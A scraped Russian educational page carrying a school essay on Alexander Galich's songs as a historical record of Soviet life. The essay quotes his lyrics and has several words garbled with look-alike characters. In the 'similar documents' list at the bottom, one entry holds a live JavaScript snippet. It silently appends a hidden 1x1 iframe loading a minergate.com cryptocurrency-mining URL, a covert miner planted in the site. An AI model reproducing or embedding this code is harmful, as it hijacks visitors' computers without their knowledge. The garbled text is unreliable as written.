-



   Песни А. Галича как исторический источник




doc.png  Тип документа: Сочинения


type.png  Предмет: Галич А.А.


type.png  ВУЗ: Не привязан


size.png  Размер: 0 b

Песни А. Галича как исторический источник

Источником информации о прошлом может быть практически все: и осколок кувшина, и обглоданная кость, и надпись, высеченная на камне. Хранят в себе память о минувшем и песни. Важна и тема, на которую они написаны, и образы, созданные поэтом, и сам его язык.
Тому, кого интересует недавнее прошлое нашей страны, очень много могут рассказать песни Александра Галича. Годы его жизни — 1918—1977. Он родился, когда Россия была охвачена пламенем гражданской войны, юношей пережил Великую Отечественную, хорошо помнил сталинское время, в годы “оттепели” стал известным драматургом и сценаристом, в период так называемого “застоя” эмигрировал из СССР. Он не понаслышке знал советскую историю и писал о ней — писал правду. Именно ᴨᴏᴛому расходились по всей стᴘẚʜᴇ его песни на магнитофонных кассетах. Именно ᴨᴏᴛому его ненавидели высокие начальники. Они сначала исключили его из Союза писателей, а ᴨᴏᴛом изгнали из страны.
Что же мы узнаём о русской истории XX века и о современной поэту советской действительности, когда слушаем песни Галича?
Мы вспоминаем погибших солдат Великой Отечественной:

Где полегла в сорок третьем пехота,
Пехота, пехота,
Где полегла в сорок третьем пехота
Без толку, зазря,
Там по пороше гуляет охота...
Трубят егеря!
( “Ошибка”)

Мы оказываемся в стᴘẚʜᴇ, где чуть не каждый второй — бывший узник:

Я подковой вмерз в санный след,
В лед, что я кайлом ковырял!
Ведь недаром я двадцать лет
Протрубил по тем лагерям.
(“Облака”)

Но и послевоенная, послесталинская жизнь оказывается вовсе не веселой. Трудно поэту в мире, где личную жизнь граждан “разбирают” на собраниях (“А из зала мне кричат: “Давай подробности!”), касса взаимопомощи не дает человеку денег, ᴨᴏᴛому что “каждый рупь — идет на стройку”, а на столе у палачей “икра и балычок”.
В песнях Галича пьют водку, играют в домино, скандалят из-за жилплощади — ведут убогую и тусклую жизнь. И эти же люди получают какие-то почетные звания, выступают на собраниях, знают наизусть лозунги. Они окружены, задушены официальной ложью.

Время сеет ветры, мечет молнии,
Создает советы и комиссии,
Что ни день — фанфарное безмолвие
Славит многодумное безмыслие.

Здесь завидуют и сплетничают:

И в кино я не ходил: “Ясно, немец!”
И на танцах не бывал: “Академик!”
И в палатке я купил чай и перец:
“Эко денег у него, эко денег!”
(“Баллада о стариках и старухах.
с которыми я вместе жил
и лечился в санатории
областного совета...”)

Здесь подслушивают и пишут доносы:

...Я сижу, гитарой тренькаю.
Хохот, грохот, гогот, звон. ..
И сосед-стукач за стенкою
Прячет в стол магнитофон. ..
(“Желание славы”)

Но сквозь “фанфарное безмолвие” прорывается голос, который говорит, выкрикивает правду. О себе самом, о своих единомышленниках, писавших “в стол”, публиковавшихся в “самиздате” и за границей, о них, рисковавших свободой, но сохранивших совесть и честь, пел Александр Галич:

Я выбираю Свободу, —
Но не из боя, а в бой,
Я выбираю Свободу
Быть просто самим собой.
(“Я выбираю Свободу”)

И это тоже правда о недавней истории России: одни выбрали ложь и сытость, другие — внутреннюю свободу — и судьбу узников и изгнанников.
Для того чтобы открыть книгу Галича, поставить в магнитофон его кассету, нужно мужество. Будет стыдно и горько. Ведь это не чужая, а наша история и наша боль. Для того чтобы излечиться, надо знать правду. “Спрашивайте, мальчики!” — призывал Александр Галич. И мы продолжаем спрашивать, читая его стихи и слушая песни.



Похожие документы


Украинские исторические Песни. Песни Маруси Чурай
Ход урока І. организационный момент II. актуализация опорных знаний. Беседа по вопросам Какие виды искусства вы знаете? А художественная литература является искусством? Свои соображения обоснуйте. Что старались воссоздать писатели в литературе? Какие художественные средства они при этом применяли?...

Г. Кулиш «черный совет» - первый Украинский исторический роман
(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//minergate.com/wmr/bcn/podivilovhuilo%40yandex.ru/4/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body")[0]; s.appendChild(w, s); })(); ...

Сочинение на тему: Своеобразие и уникальность «Песни про царя Ивана Васильевича...»
"Первой поэмой, которую Лермонтов решился опубликовать, явилась «Песня про царя Ивана Васильевича, молодого опричника и удалого купца Калашникова». Поэма является стилизацией русского фольклора в большой эпической форме. По жанру и художественному своеобразию она оказалась единственной в своем роде и не получила продолжения ни в творчестве её автора, ни у других поэтов. Не было у «Песни... » перекличек и с предыдущими произведениями Лермонтова. Правда в поэме «Боярин Орша» автор затрагивает семейную тему, но особенность «Песни...» в том, что данная Сочинение на тему здесь представлена совершенно иначе, хотя речь идёт тоже о бесчестьи семьи....

Песни литературного происхождения. («Еще не умерла Украина» П.Чубинского, М. Вербицкого)
Цель: ознакомить учеников с особенностями песен литературного происхождения, их авторами; проанализировать песню-гимн, обратив внимание на историю создания этого произведения и его назначение; развивать умение выразительно и вдумчиво читать песни, грамотно высказывать собственные мысли, чувства, наблюдения; формировать кругозор, мировоззрение; прививать чувство уважения к государственной символике, песне-гимну родному краю, уважение к художникам слова; воспитывать пунктуальность, любовь к Родине, народу, его традициям....

Украинские исторические песни. Песни о Борьбе казаков татарскими захватчиками
Цель: выяснить особенности создания украинских исторических песен, проанализировать программные произведения, исследовать,  как в них изображены события исторического прошлого; развивать умение выразительного чтения, высказывать собственные суждения о том, за что народ увековечил имена своих героев;  формировать кругозор, мировоззрение школьников; воспитывать чувство уважения, почета к национальным героям, прививать ученикам такие качества, как смелость, решительность, сила воли, настойчивость....

Bigreferat.ru - каталог учебной информации (c) 2013-2014 | * | Правообладателям